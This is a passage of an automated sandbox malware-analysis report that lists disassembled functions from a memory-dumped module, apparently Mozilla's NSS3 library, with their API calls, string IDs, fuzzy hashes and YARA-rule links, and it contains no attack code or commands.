                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFromK11_MakeSectionUnlockValue
                                                                                                                                                                                                                                                                                          • String ID: NSS_USE_DECODED_CKA_EC_POINT$S&sl$S&sl
                                                                                                                                                                                                                                                                                          • API String ID: 2280678669-1546187144
                                                                                                                                                                                                                                                                                          • Opcode ID: 08f77cc6cbe71c792981c8a53c5def6c9ab88565e9aeb2bcd5d7602f19d2ee6f
                                                                                                                                                                                                                                                                                          • Instruction ID: 7fdd2592afd3786d1938b0e6bf9b21cd76ad4bd6d4aac681081486210a7f03bf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f77cc6cbe71c792981c8a53c5def6c9ab88565e9aeb2bcd5d7602f19d2ee6f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF1F5B5A042158FDB54CF18C984B86BBF4FF09318F5582AADC089B746E774EA84CF91
                                                                                                                                                                                                                                                                                          Function 6C760C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(*,vl), ref: 6C760C81
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE30: SECOID_FindOID_Util.NSS3(6C70311B,00000000,?,6C70311B,?), ref: 6C74BE44
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C738500: SECOID_GetAlgorithmTag_Util.NSS3(6C7395DC,00000000,00000000,00000000,?,6C7395DC,00000000,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C738517
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C760CC4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FAB0: free.MOZGLUE(?,-00000001,?,?,6C6EF673,00000000,00000000), ref: 6C74FAC7
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C760CD5
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C760D1D
                                                                                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C760D3B
                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C760D7D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C760DB5
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C760DC1
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C760DF7
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C760E05
                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C760E0F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C7395E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C7395F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C739609
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C73961D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: PK11_GetInternalSlot.NSS3 ref: 6C73970B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C739756
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: PK11_GetIVLength.NSS3(?), ref: 6C739767
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C73977E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7395C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C73978E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                          • String ID: *,vl$*,vl$-$vl
                                                                                                                                                                                                                                                                                          • API String ID: 3136566230-496442567
                                                                                                                                                                                                                                                                                          • Opcode ID: e59e5096252f0188678897e25259366007a9c06e7090a8bb44ce9736e2517740
                                                                                                                                                                                                                                                                                          • Instruction ID: aa7b0b1017373bd429c1233877b8d706b7c5d9c1a84668ff2deb0ace70ba0af4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e59e5096252f0188678897e25259366007a9c06e7090a8bb44ce9736e2517740
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C641C2B1900245ABEB009F65DE4ABEF7678EF0030CF144134ED1957B42EB35AA18CBE6
                                                                                                                                                                                                                                                                                          Function 6C755CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C755EC0,00000000,?,?), ref: 6C755CBE
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C755CD7
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C755CF0
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C755D09
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C755EC0,00000000,?,?), ref: 6C755D1F
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C755D3C
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755D51
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755D66
                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C755D80
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                                                          • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                                                          • Opcode ID: a7f5ce7258845ee4b2fec44c3632a515ecb0016174b0c1b32687b826ee5ba4e8
                                                                                                                                                                                                                                                                                          • Instruction ID: 5f70cb6b64fc7d580e21cd5c6cd23693067bb424a1a5134cd676768362207b94
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7f5ce7258845ee4b2fec44c3632a515ecb0016174b0c1b32687b826ee5ba4e8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A3126A2601311ABE7A06A64EECEF263768AF0224CF501430ED59A7B82FF61D425C2D5
                                                                                                                                                                                                                                                                                          Function 6C756CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C821DE0,?), ref: 6C756CFE
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C756D26
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C756D70
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C756D82
                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C756DA2
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C756DD8
                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C756E60
                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C756F19
                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C756F2D
                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C756F7B
                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C757011
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C757033
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75703F
                                                                                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C757060
                                                                                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C757087
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7570AF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d5774b734f93b811e154ba9a6126cf4b69a99aa2ae5dc60dcdb18d1f7c559176
                                                                                                                                                                                                                                                                                          • Instruction ID: 3d90cb22b116ddc65ee14a6ecd54bbc606a2d10aa8cc71585e8144f2ffea791c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5774b734f93b811e154ba9a6126cf4b69a99aa2ae5dc60dcdb18d1f7c559176
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0A15E71A152009BEB009F24DE49B5B32A4EB8131CFA48939E919CBBC1FF35DA65C753
                                                                                                                                                                                                                                                                                          Function 6C71AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71AF25
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71AF39
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71AF51
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71AF69
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C71B06B
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C71B083
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C71B0A4
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C71B0C1
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C71B0D9
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C71B102
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C71B151
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C71B182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FAB0: free.MOZGLUE(?,-00000001,?,?,6C6EF673,00000000,00000000), ref: 6C74FAC7
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C71B177
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71B1A2
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71B1AA
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C6FAB95,00000000,?,00000000,00000000,00000000), ref: 6C71B1C2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C741560: TlsGetValue.KERNEL32(00000000,?,6C710844,?), ref: 6C74157A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C741560: EnterCriticalSection.KERNEL32(?,?,?,6C710844,?), ref: 6C74158F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C741560: PR_Unlock.NSS3(?,?,?,?,6C710844,?), ref: 6C7415B2
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a10a03920fb82d8b3b75fc0bf143b534d2d158ccec1e0c2063edcf49d3847cec
                                                                                                                                                                                                                                                                                          • Instruction ID: da4dd7964646ce59763ae807be11cdbcbe2ed35fbacaff18c2ae9b7ef6b0f685
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a10a03920fb82d8b3b75fc0bf143b534d2d158ccec1e0c2063edcf49d3847cec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58A1CFB1E002059BEF009F64DD49AAAB7B4AF0931CF184035E905A6B52EB31E959CBE1
                                                                                                                                                                                                                                                                                          Function 6C712C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(#?ql,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23,?), ref: 6C712C62
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23,?), ref: 6C712C76
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23,?), ref: 6C712C86
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23,?), ref: 6C712C93
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23,?), ref: 6C712CC6
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23,?), ref: 6C712CDA
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C70E477,?,?,?,00000001,00000000,?,?,6C713F23), ref: 6C712CEA
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C70E477,?,?,?,00000001,00000000,?), ref: 6C712CF7
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C70E477,?,?,?,00000001,00000000,?), ref: 6C712D4D
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C712D61
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C712D71
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C712D7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C67204A), ref: 6C6E07E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,6C67204A), ref: 6C6E0864
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6E0880
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C67204A), ref: 6C6E08CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08FB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                          • String ID: #?ql
                                                                                                                                                                                                                                                                                          • API String ID: 2446853827-3470006437
                                                                                                                                                                                                                                                                                          • Opcode ID: f9f31659fba62b68b56386ef98aa429f0f6baa0e75aedfe26bb78544fdb751ca
                                                                                                                                                                                                                                                                                          • Instruction ID: 1817f44a1a3b67c87d3a8f70ba8946b6e71cf5ee83ad582d85e9401503662cf5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9f31659fba62b68b56386ef98aa429f0f6baa0e75aedfe26bb78544fdb751ca
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251F7B5D04205ABDB00AF24DD498AAB7B8BF1A25CB088535ED1897B12F731ED58C7D1
                                                                                                                                                                                                                                                                                          Function 6C76AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76ADB1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE30: SECOID_FindOID_Util.NSS3(6C70311B,00000000,?,6C70311B,?), ref: 6C74BE44
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C76ADF4
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C76AE08
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C76AE25
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C76AE63
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C76AE4D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: TlsGetValue.KERNEL32(?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674C97
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CB0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: PR_Unlock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CC9
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76AE93
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C76AECC
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C76AEDE
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C76AEE6
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76AEF5
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C76AF16
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
